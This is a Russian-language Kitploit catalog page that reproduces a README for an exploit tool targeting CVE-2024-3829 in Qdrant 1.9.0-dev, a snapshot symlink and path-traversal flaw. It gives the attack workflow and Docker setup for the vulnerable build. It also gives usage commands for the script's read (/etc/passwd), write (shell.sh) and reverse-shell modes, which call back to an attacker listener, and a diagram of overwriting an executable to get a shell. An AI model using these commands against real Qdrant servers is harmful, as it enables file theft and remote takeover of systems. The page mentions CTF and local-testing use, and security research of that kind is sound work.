Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-3829 — CVE-2024-3829 | Kitploit
Инструменты/GitHubGitHub/fabse-hack/cve-2024-3829
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеРазработка Полезной Нагрузки
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

CVE-2024-3829

Репозиторий
11 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-3829 для Qdrant - Exploit

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

Этот репозиторий документирует и демонстрирует CVE-2024-3829 для qdrant/qdrant (v1.9.0-dev)

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • Дополнительная информация и идея для этого репозитория:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

Поддержка и пожертвования

Paypal:

Buy Me a Coffee:

Обзор

Уязвимость позволяет манипулировать архивами снимков (snapshot) с помощью трюков с симлинками и путями. Это даёт два класса воздействия и обратную оболочку hahhaa:

  1. Чтение файла
  2. Запись файла
  3. Запуск обратной оболочки

В зависимости от окружения примитивы записи файлов могут привести к выполнению кода.

Затронутое программное обеспечение (см. по ссылке NVD)

  • Продукт: Qdrant
  • Версия: 1.9.0-dev
  • Компонент: Импорт/Экспорт снимков

Примечание к номеру версии:

Эта версия больше не доступна во всемирной паутине (некоторые называют её "интернет").
В репозитории qdrant отчёт NVD Nist указывает на коммит, который и представляет уязвимую v1.9.0-dev.
Если вы хотите установить эту версию для CTF / других целей в Docker, используйте:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

Рабочий процесс (упрощённо)

  1. Создать коллекцию
  2. Сгенерировать снимок
  3. Распаковать и изменить снимок локально
  4. Внедрить симлинк в архив (цель чтения/записи)
  5. Загрузить изменённый снимок
  6. Запустить восстановление снимка
  7. Оценить результат: чтение содержимого файла / запись файла / выполнение обратной оболочки

Содержимое репозитория

  • cve_2024_3829.py - Эксплойт для рабочего процесса чтения/записи/запуска
  • requirements.txt - Зависимости Python

Требования

  • Рекомендуется система Kali Linux
  • Python 3.10+
  • Работающий сервер Qdrant (для локального тестирования)
  • Пакет Python requests

Установка:

root@kitploit:~
python3 -m pip install -r requirements.txt

Использование

Показать все опции:

root@kitploit:~
python3 cve_2024_3829.py -h

Примеры:

root@kitploit:~
# Read mode
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# Write mode
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# Reverse shell mode
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

Доступные параметры

  • -h, --help: показать справку CLI
  • -m, --mode: один из read, write, reverse_shell (обязательный)
    параметры цели:
  • -tu, --target_url: базовый URL Qdrant (по умолчанию в скрипте)
  • -tp, --target_port: порт целевого Qdrant (по умолчанию: 6333)
  • -tpath, --target_path: удалённый целевой путь (по умолчанию: /etc/)

Примечания

  • --target_url должен быть базовым URL без указания порта в конце, если вы передаёте --target_port отдельно, так как скрипт строит URL как <url>:<target_port>/....
  • В режиме read скрипт объединяет --target_path и --target_file_name (например, /etc/ + passwd).
  • В режиме write --attacker_path должен указывать на существующий локальный файл, а --attacker_file_name определяет имя удалённого файла.
  • Для сетевых тестов через границы Docker/WSL/хоста сначала проверьте доступность (например, с помощью netcat) перед запуском режима триггера.
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
Скачать инструмент
  • -tf, --target_file_name: имя удалённого целевого файла (по умолчанию: passwd)
    параметры атакующего:
  • -ai, --attacker_ip: IP для обратного вызова/прослушивателя в режиме reverse_shell
  • -ap, --attacker_port: порт для обратного вызова/прослушивателя (по умолчанию: 9001)
  • -apath, --attacker_path: локальный путь к файлу атакующего для режима записи (по умолчанию: /tmp/)
  • -af, --attacker_file_name: имя файла, используемое на цели в режиме записи (по умолчанию: shell.sh)